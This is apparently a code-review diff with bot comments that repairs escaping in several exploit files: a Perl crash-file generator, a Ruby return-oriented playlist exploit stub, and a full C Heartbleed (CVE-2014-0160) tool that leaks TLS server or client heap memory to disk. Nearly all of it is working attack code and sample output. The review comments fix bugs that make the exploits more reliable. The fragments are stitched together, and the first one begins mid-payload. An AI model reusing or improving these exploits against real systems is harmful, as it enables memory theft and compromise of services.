"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
|
||||
"\x65\x72\x22\x20\x2f\x3e\x00";
|
||||
|
||||
my $file=\"crash.mov\";
|
||||
open(my $file, \">>$file\") or die \"Cannot open $file: $!\";
|
||||
my $file="crash.mov";
|
||||
open(my $file, ">>$file") or die "Cannot open $file: $!";
|
||||
print $file $payload;
|
||||
close($file);
|
||||
|
||||
|
|
|
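Review bot: the restored literals look right (`"\x3c\x3f\x78..."` is a valid Perl double-quoted string with `\xNN` escapes, which the old `\"\\x3c...` form was not), but the context lines `my $file="crash.mov";` followed by `open(my $file, ">>$file") or die "Cannot open $file: $!";` redeclare `$file` as the filehandle in the same scope. It works only because a `my` declaration takes effect after the statement that contains it, so `">>$file"` and the `die` message still see `"crash.mov"`; under `-w` or `use warnings` Perl flags the masked declaration, and `>>` appends rather than truncates, so a second run produces a doubled file. Renaming the handle to `$fh` and opening with `>` would make the intent clear.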
@ -1,4 +1,4 @@
|
|||
Sun\\\'s VirtualBox host reboot PoC
|
||||
Sun's VirtualBox host reboot PoC
|
||||
by Tadas Vilkeliskis <vilkeliskis.t@gmail.com>
|
||||
Disclosure made at 2009-08-01
|
||||
|
||||
|
|
|
@ -18,43 +18,43 @@ JMP_EAX = 0x8fe24459
|
|||
|
||||
def make_exec_payload_from_heap_stub()
|
||||
frag0 =
|
||||
\\\"\\\\x90\\\" + # nop
|
||||
\\\"\\\\x58\\\" + # pop eax
|
||||
\\\"\\\\x61\\\" + # popa
|
||||
\\\"\\\\xc3\\\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x61" + # popa
|
||||
"\xc3" # ret
|
||||
frag1 =
|
||||
\\\"\\\\x90\\\" + # nop
|
||||
\\\"\\\\x58\\\" + # pop eax
|
||||
\\\"\\\\x89\\\\xe0\\\" + # mov eax, esp
|
||||
\\\"\\\\x83\\\\xc0\\\\x0c\\\" + # add eax, byte +0xc
|
||||
\\\"\\\\x89\\\\x44\\\\x24\\\\x08\\\" + # mov [esp+0x8], eax
|
||||
\\\"\\\\xc3\\\" # ret
|
||||
"\x90" + # nop
|
||||
"\x58" + # pop eax
|
||||
"\x89\xe0" + # mov eax, esp
|
||||
"\x83\xc0\x0c" + # add eax, byte +0xc
|
||||
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
|
||||
"\xc3" # ret
|
||||
exec_payload_from_heap_stub =
|
||||
frag0 +
|
||||
[SETJMP, JMP_BUF + 32, JMP_BUF].pack(\\\"V3\\\") +
|
||||
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
|
||||
frag1 +
|
||||
\\\"X\\\" * 20 +
|
||||
"X" * 20 +
|
||||
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
|
||||
JMP_EAX].pack(\\\"V5\\\") +
|
||||
\\\"X\\\" * 4
|
||||
JMP_EAX].pack("V5") +
|
||||
"X" * 4
|
||||
end
|
||||
|
||||
payload_cmd = \\\"hereisthetrick\\\"
|
||||
payload_cmd = "hereisthetrick"
|
||||
stub = make_exec_payload_from_heap_stub()
|
||||
ext = \\\"A\\\" * 59
|
||||
ext = "A" * 59
|
||||
stub = make_exec_payload_from_heap_stub()
|
||||
exploit = ext + stub + payload_cmd
|
||||
|
||||
# pls file format
|
||||
|
||||
file = \\\"[playlist]\\\\n\\\"
|
||||
file += \\\"NumberOfEntries=1\\\\n\\\"
|
||||
file += \\\"File1=http://1/asdf.\\\" + exploit + \\\"\\\\n\\\"
|
||||
file += \\\"Title1=asdf\\\\n\\\"
|
||||
file += \\\"Length1=100\\\\n\\\"
|
||||
file += \\\"Version=2\\\" + \\\'\\\\n\\\'
|
||||
file = "[playlist]\n"
|
||||
file += "NumberOfEntries=1\n"
|
||||
file += "File1=http://1/asdf." + exploit + "\n"
|
||||
file += "Title1=asdf\n"
|
||||
file += "Length1=100\n"
|
||||
file += "Version=2" + '\n'
|
||||
|
||||
File.open(\\\'poc.pls\\\',\\\'w\\\') do |f|
|
||||
File.open('poc.pls','w') do |f|
|
||||
f.puts file
|
||||
f.close
|
||||
end
|
||||
|
|
|
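Review bot: `stub = make_exec_payload_from_heap_stub()` appears twice in the context lines of this hunk, once before `ext = "A" * 59` and again immediately after; the second call is redundant and merely recomputes the same value. It is harmless because the function has no side effects, but the duplicate should be dropped if this file is touched again. The unescaped `"\x90" + # nop` lines themselves are correct Ruby (the trailing `+` continues the expression past the comment and newline).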
@ -16,7 +16,7 @@
|
|||
* and can be run in a loop until the connected peer ends connection.
|
||||
* The data leaked contains 16 bytes of random padding at the end.
|
||||
* The exploit can be used against a connecting client or server,
|
||||
* it can also send pre_cmd\\\'s to plain-text services to establish
|
||||
* it can also send pre_cmd's to plain-text services to establish
|
||||
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
|
||||
* will often forcefully close the connection during large leak
|
||||
* requests so try to lower your payload request size.
|
||||
|
@ -35,23 +35,23 @@
|
|||
* [ decrypting SSL packet
|
||||
* [ heartbleed leaked length=65535
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16381 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16381 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=16408
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=16384
|
||||
* [ wrote 16384 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 16384 bytes of heap to file 'out'
|
||||
* [ heartbeat returned type=24 length=42
|
||||
* [ decrypting SSL packet
|
||||
* [ final record type=24, length=18
|
||||
* [ wrote 18 bytes of heap to file \\\'out\\\'
|
||||
* [ wrote 18 bytes of heap to file 'out'
|
||||
* [ done.
|
||||
* $ ls -al out
|
||||
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
|
||||
|
@ -60,11 +60,11 @@
|
|||
*
|
||||
* Use following example command to generate certificates for clients.
|
||||
*
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\\
|
||||
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
|
||||
* -keyout server.key -out server.crt
|
||||
*
|
||||
* Debian compile with \\\"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\\
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\\\"
|
||||
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
|
||||
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
|
||||
*
|
||||
* todo: add udp/dtls support.
|
||||
*
|
||||
|
@ -93,9 +93,9 @@
|
|||
#include <openssl/rand.h>
|
||||
#include <openssl/buffer.h>
|
||||
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\\
|
||||
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
|
||||
(((unsigned int)(c[1])) )),c+=2)
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\\
|
||||
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
|
||||
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
|
||||
|
||||
int first = 0;
|
||||
|
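Review bot: the `n2s` and `s2n` macros only work with a single trailing `\`. With the old `\\` the last backslash still splices the line, but the first one survives as a stray token inside the macro body, so every `n2s(p,rr->length)` or `s2n(type,p)` expansion later in the file would fail to compile; the new lines restore the intended continuation. Note for readers of the later hunks that both macros advance `c` by 2 as a side effect of the comma expression, so they must not be passed an argument that itself has side effects.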
@ -135,20 +135,20 @@ int tcp_connect(char* server,int port){
|
|||
host = gethostbyname(server);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
sa.sin_addr = *((struct in_addr *) host->h_addr);
|
||||
bzero(&(sa.sin_zero),8);
|
||||
printf(\\\"[ connecting to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connecting to %s %d/tcp\n",server,port);
|
||||
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
|
||||
if(ret==0){
|
||||
printf(\\\"[ connected to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[ connected to %s %d/tcp\n",server,port);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[!] FATAL: could not connect to %s %d/tcp\\\\n\\\",server,port);
|
||||
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
|
||||
exit(0);
|
||||
}
|
||||
return sd;
|
||||
|
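Review bot: unrelated to the quoting fix but visible in the context lines, `host = gethostbyname(server);` is never checked for NULL before `sa.sin_addr = *((struct in_addr *) host->h_addr);`, so an unresolvable hostname dereferences a null pointer instead of printing a `[!]` error the way the `socket()` failure path does. A `if(host==NULL){ printf("[!] cannot resolve %s\n",server); exit(0); }` right after the lookup would bring it in line with the rest of the function.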
@ -161,7 +161,7 @@ int tcp_bind(char* server, int port){
|
|||
host = gethostbyname(server);
|
||||
sd=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] cannot create socket\\\\n\\\");
|
||||
printf("[!] cannot create socket\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(&sin,0,sizeof(sin));
|
||||
|
@ -171,7 +171,7 @@ int tcp_bind(char* server, int port){
|
|||
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
|
||||
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
|
||||
if(ret==-1){
|
||||
printf(\\\"[!] cannot bind socket\\\\n\\\");
|
||||
printf("[!] cannot bind socket\n");
|
||||
exit(0);
|
||||
}
|
||||
listen(sd,5);
|
||||
|
@ -191,7 +191,7 @@ connection* tls_connect(int sd){
|
|||
connection *c;
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -210,7 +210,7 @@ connection* tls_connect(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
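Review bot: the heartbeat check in the context lines has an operator-precedence bug: in `if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || ...` the `!` binds tighter than `&`, so it evaluates `(!tlsext_heartbeat) & SSL_TLSEXT_HB_ENABLED` rather than `!(tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED)`, and the "heartbeat extension is unsupported" warning is only reached when the whole flags word is zero. Wrapping the `&` expression in parentheses fixes it; the identical expression appears again in `tls_bind` in a later hunk.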
@ -221,13 +221,13 @@ connection* tls_bind(int sd){
|
|||
char* buf;
|
||||
buf = malloc(4096);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buf,0,4096);
|
||||
c = malloc(sizeof(connection));
|
||||
if(c==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
c->socket = sd;
|
||||
|
@ -238,10 +238,10 @@ connection* tls_bind(int sd){
|
|||
ERR_print_errors_fp(stderr);
|
||||
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
|
||||
SSL_CTX_SRP_CTX_init(c->sslContext);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, \\\"./server.crt\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, \\\"./server.key\\\", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
|
||||
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
|
||||
if(!SSL_CTX_check_private_key(c->sslContext)){
|
||||
printf(\\\"[!] FATAL: private key does not match the certificate public key\\\\n\\\");
|
||||
printf("[!] FATAL: private key does not match the certificate public key\n");
|
||||
exit(0);
|
||||
}
|
||||
c->sslHandle = SSL_new(c->sslContext);
|
||||
|
@ -250,12 +250,12 @@ connection* tls_bind(int sd){
|
|||
if(!SSL_set_fd(c->sslHandle,c->socket))
|
||||
ERR_print_errors_fp(stderr);
|
||||
int rc = SSL_accept(c->sslHandle);
|
||||
printf (\\\"[ SSL connection using %s\\\\n\\\", SSL_get_cipher (c->sslHandle));
|
||||
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
|
||||
bytes = SSL_read(c->sslHandle, buf, 4095);
|
||||
printf(\\\"[ recieved: %d bytes - showing output\\\\n%s\\\\n[\\\\n\\\",bytes,buf);
|
||||
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
|
||||
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
|
||||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
|
||||
printf(\\\"[ warning: heartbeat extension is unsupported (try anyway)\\\\n\\\");
|
||||
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
|
||||
}
|
||||
return c;
|
||||
}
|
||||
|
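Review bot: `int rc = SSL_accept(c->sslHandle);` is assigned and never checked, so a failed handshake falls straight through to `printf ("[ SSL connection using %s\n", ...)` and `SSL_read`, reporting a connection that was never established; the result should be tested before proceeding. Minor: `"[ recieved: %d bytes - showing output\n%s\n[\n"` misspells "received", and `SSL_CTX_use_certificate_file` / `SSL_CTX_use_PrivateKey_file` in the previous hunk have their return values ignored even though `SSL_CTX_check_private_key` is checked.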
@ -269,16 +269,16 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
char* line2;
|
||||
switch(precmd){
|
||||
case 0:
|
||||
line1 = \\\"EHLO test\\\\n\\\";
|
||||
line2 = \\\"STARTTLS\\\\n\\\";
|
||||
line1 = "EHLO test\n";
|
||||
line2 = "STARTTLS\n";
|
||||
break;
|
||||
case 1:
|
||||
line1 = \\\"CAPA\\\\n\\\";
|
||||
line2 = \\\"STLS\\\\n\\\";
|
||||
line1 = "CAPA\n";
|
||||
line2 = "STLS\n";
|
||||
break;
|
||||
case 2:
|
||||
line1 = \\\"a001 CAPB\\\\n\\\";
|
||||
line2 = \\\"a002 STARTTLS\\\\n\\\";
|
||||
line1 = "a001 CAPB\n";
|
||||
line2 = "a002 STARTTLS\n";
|
||||
break;
|
||||
default:
|
||||
go = 1;
|
||||
|
@ -287,23 +287,23 @@ int pre_cmd(int sd,int precmd,int verbose){
|
|||
if(go==0){
|
||||
buffer = malloc(2049);
|
||||
if(buffer==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
printf(\\\"[ banner: %s\\\",buffer);
|
||||
printf("[ banner: %s",buffer);
|
||||
send(sd,line1,strlen(line1),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
send(sd,line2,strlen(line2),0);
|
||||
memset(buffer,0,2049);
|
||||
rc = read(sd,buffer,2048);
|
||||
if(verbose==1){
|
||||
printf(\\\"%s\\\\n\\\",buffer);
|
||||
printf("%s\n",buffer);
|
||||
}
|
||||
}
|
||||
return sd;
|
||||
|
@ -314,7 +314,7 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
int ret;
|
||||
buf = OPENSSL_malloc(1 + 2);
|
||||
if(buf==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
p = buf;
|
||||
|
@ -327,11 +327,11 @@ void* heartbleed(connection *c,unsigned int type){
|
|||
s2n(0xffff,p);
|
||||
break;
|
||||
default:
|
||||
printf(\\\"[ setting heartbeat payload_length to %u\\\\n\\\",type);
|
||||
printf("[ setting heartbeat payload_length to %u\n",type);
|
||||
s2n(type,p);
|
||||
break;
|
||||
}
|
||||
printf(\\\"[ <3 <3 <3 heart bleed <3 <3 <3\\\\n\\\");
|
||||
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
|
||||
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
|
||||
OPENSSL_free(buf);
|
||||
return c;
|
||||
|
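Review bot: `ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);` stores the result and then ignores it, so a failed or partial write is indistinguishable from success and the caller goes on to wait for a response that was never sent; check `ret <= 0` and return NULL. The function is declared `void*` yet returns `c`, and `sneakyleaky` later uses a bare `return;` in a `void*` function as well; pick one return type and use it consistently. `ssl3_write_bytes` and the direct `c->sslHandle->...` struct access elsewhere in the file are OpenSSL-internal, so this only builds against 1.0.x where those symbols and struct layouts are still exposed.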
@ -368,18 +368,18 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
version=(ssl_major<<8)|ssl_minor;
|
||||
n2s(p,rr->length);
|
||||
if(rr->type==24){
|
||||
printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
|
||||
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
|
||||
if(rr->length > 16834){
|
||||
printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
|
||||
printf("[ error: got a malformed TLS length.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
|
||||
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
|
||||
s->packet_length=0;
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
goto apple;
|
||||
|
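Review bot: `if(rr->length > 16834)` looks like a transposition of 16384 (SSL3_RT_MAX_PLAIN_LENGTH), but `rr->length` here is the on-wire length read by `n2s(p,rr->length);` before decryption, and the sample log in the second file's header shows `heartbeat returned type=24 length=16408`, so a bound of 16384 would reject real records; replace the magic number with a named constant for the bound actually intended (the maximum encrypted record length) and say so in a comment. The string `"[ error: too many bad packets recieved\n"` misspells "received", here and again at the `apple:` label further down.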
@ -390,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
n=ssl3_read_n(s,i,i,1);
|
||||
if (n <= 0) goto apple;
|
||||
}
|
||||
printf(\\\"[ decrypting SSL packet\\\\n\\\");
|
||||
printf("[ decrypting SSL packet\n");
|
||||
s->rstate=SSL_ST_READ_HEADER;
|
||||
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
|
||||
rr->data=rr->input;
|
||||
|
@ -457,11 +457,11 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
|
||||
first = 2;
|
||||
leakbytes = heartbleed_len + 16;
|
||||
printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
|
||||
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
|
||||
}
|
||||
if(verbose==1){
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
|
||||
printf(\\\"\\\\n\\\");
|
||||
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
|
||||
printf("\n");
|
||||
}
|
||||
leakbytes-=rr->length;
|
||||
if(leakbytes > 0){
|
||||
|
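Review bot: `heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;` is a hand-rolled 16-bit byte swap; `ntohs()` says what is meant and is already available through the socket headers this file uses (`htons` is called in `tcp_connect`). The `+ 16` in `leakbytes = heartbleed_len + 16;` is the padding the file header describes (`The data leaked contains 16 bytes of random padding at the end`) and deserves a named constant rather than a literal, as does the `16` that wraps the verbose hex dump.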
@ -470,7 +470,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
else{
|
||||
repeat = 0;
|
||||
}
|
||||
printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
|
||||
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
|
||||
int output = s->s3->rrec.length-3;
|
||||
if(output > 0){
|
||||
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
|
||||
|
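Review bot: `int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);` is never checked for -1, and the next hunk calls `write(fd, ...)` regardless, so an unwritable path silently drops the output while still printing `[ wrote %d bytes of heap to file '%s'`. Check `fd < 0` (perror and return), and use mode 0600: the file holds raw memory contents received from the peer, so it should not be readable by other users, and there is no reason for the execute bit on a data file.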
@ -478,48 +478,48 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
|
|||
first--;
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
/* first three bytes are resp+len */
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
|
||||
}
|
||||
else{
|
||||
/* heap data & 16 bytes padding */
|
||||
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
|
||||
printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
|
||||
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else{
|
||||
printf(\\\"[ nothing from the heap to write\\\\n\\\");
|
||||
printf("[ nothing from the heap to write\n");
|
||||
}
|
||||
return;
|
||||
apple:
|
||||
printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
|
||||
printf("[ problem handling SSL record packet - wrong type?\n");
|
||||
badpackets++;
|
||||
if(badpackets > 3){
|
||||
printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
|
||||
printf("[ error: too many bad packets recieved\n");
|
||||
exit(0);
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
void usage(){
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --server|-s <ip/dns> - the server to target\\\\n\\\");
|
||||
printf(\\\"[ --port|-p <port> - the port to target\\\\n\\\");
|
||||
printf(\\\"[ --file|-f <filename> - file to write data to\\\\n\\\");
|
||||
printf(\\\"[ --bind|-b <ip> - bind to ip for exploiting clients\\\\n\\\");
|
||||
printf(\\\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\\\n\\\");
|
||||
printf(\\\"[ 0 = SMTP\\\\n\\\");
|
||||
printf(\\\"[ 1 = POP3\\\\n\\\");
|
||||
printf(\\\"[ 2 = IMAP\\\\n\\\");
|
||||
printf(\\\"[ --loop|-l - loop the exploit attempts\\\\n\\\");
|
||||
printf(\\\"[ --type|-t <n> - select exploit to try\\\\n\\\");
|
||||
printf(\\\"[ 0 = null length\\\\n\\\");
|
||||
printf(\\\"[ 1 = max leak\\\\n\\\");
|
||||
printf(\\\"[ n = heartbeat payload_length\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf(\\\"[ --verbose|-v - output leak to screen\\\\n\\\");
|
||||
printf(\\\"[ --help|-h - this output\\\\n\\\");
|
||||
printf(\\\"[\\\\n\\\");
|
||||
printf("[\n");
|
||||
printf("[ --server|-s <ip/dns> - the server to target\n");
|
||||
printf("[ --port|-p <port> - the port to target\n");
|
||||
printf("[ --file|-f <filename> - file to write data to\n");
|
||||
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
|
||||
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
|
||||
printf("[ 0 = SMTP\n");
|
||||
printf("[ 1 = POP3\n");
|
||||
printf("[ 2 = IMAP\n");
|
||||
printf("[ --loop|-l - loop the exploit attempts\n");
|
||||
printf("[ --type|-t <n> - select exploit to try\n");
|
||||
printf("[ 0 = null length\n");
|
||||
printf("[ 1 = max leak\n");
|
||||
printf("[ n = heartbeat payload_length\n");
|
||||
printf("[\n");
|
||||
printf("[ --verbose|-v - output leak to screen\n");
|
||||
printf("[ --help|-h - this output\n");
|
||||
printf("[\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
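Review bot: both `write(fd,s->s3->rrec.data+3,s->s3->rrec.length);` calls start 3 bytes into the record but pass the full record length, so each write reads 3 bytes past the end of the record; the comment `/* first three bytes are resp+len */` and the first printf's count `s->s3->rrec.length-3` both say the intended length is `length-3`. Make the write length match the printed count, check the `write()` return value, and replace the bare `return;` in this `void*` function with `return NULL;`. In `usage()`, the `--precmd|-c` list ends at `2 = IMAP` while `pre_cmd` treats any other value as "no pre-command" (`default: go = 1;`); the help text should say that explicitly.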
@ -531,88 +531,88 @@ int main(int argc, char* argv[]){
|
|||
connection* c;
|
||||
char *host, *file;
|
||||
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
|
||||
printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
|
||||
printf(\\\"[ =============================================================\\\\n\\\");
|
||||
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
|
||||
printf("[ =============================================================\n");
|
||||
static struct option options[] = {
|
||||
{\\\"server\\\", 1, 0, \\\'s\\\'},
|
||||
{\\\"port\\\", 1, 0, \\\'p\\\'},
|
||||
{\\\"file\\\", 1, 0, \\\'f\\\'},
|
||||
{\\\"type\\\", 1, 0, \\\'t\\\'},
|
||||
{\\\"bind\\\", 1, 0, \\\'b\\\'},
|
||||
{\\\"verbose\\\", 0, 0, \\\'v\\\'},
|
||||
{\\\"precmd\\\", 1, 0, \\\'c\\\'},
|
||||
{\\\"loop\\\", 0, 0, \\\'l\\\'},
|
||||
{\\\"help\\\", 0, 0,\\\'h\\\'}
|
||||
{"server", 1, 0, 's'},
|
||||
{"port", 1, 0, 'p'},
|
||||
{"file", 1, 0, 'f'},
|
||||
{"type", 1, 0, 't'},
|
||||
{"bind", 1, 0, 'b'},
|
||||
{"verbose", 0, 0, 'v'},
|
||||
{"precmd", 1, 0, 'c'},
|
||||
{"loop", 0, 0, 'l'},
|
||||
{"help", 0, 0,'h'}
|
||||
};
|
||||
while(userc != -1) {
|
||||
userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvh\\\",options,&index);
|
||||
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
|
||||
switch(userc) {
|
||||
case -1:
|
||||
break;
|
||||
case \\\'s\\\':
|
||||
case 's':
|
||||
if(ihost==0){
|
||||
ihost = 1;
|
||||
h = gethostbyname(optarg);
|
||||
if(h==NULL){
|
||||
printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
|
||||
printf("[!] FATAL: unknown host '%s'\n",optarg);
|
||||
exit(1);
|
||||
}
|
||||
host = malloc(strlen(optarg) + 1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'p\\\':
|
||||
case 'p':
|
||||
if(iport==0){
|
||||
port = atoi(optarg);
|
||||
iport = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'f\\\':
|
||||
case 'f':
|
||||
if(ifile==0){
|
||||
file = malloc(strlen(optarg) + 1);
|
||||
if(file==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(file,\\\"%s\\\",optarg);
|
||||
sprintf(file,"%s",optarg);
|
||||
ifile = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'t\\\':
|
||||
case 't':
|
||||
if(itype==0){
|
||||
type = atoi(optarg);
|
||||
itype = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'h\\\':
|
||||
case 'h':
|
||||
usage();
|
||||
break;
|
||||
case \\\'b\\\':
|
||||
case 'b':
|
||||
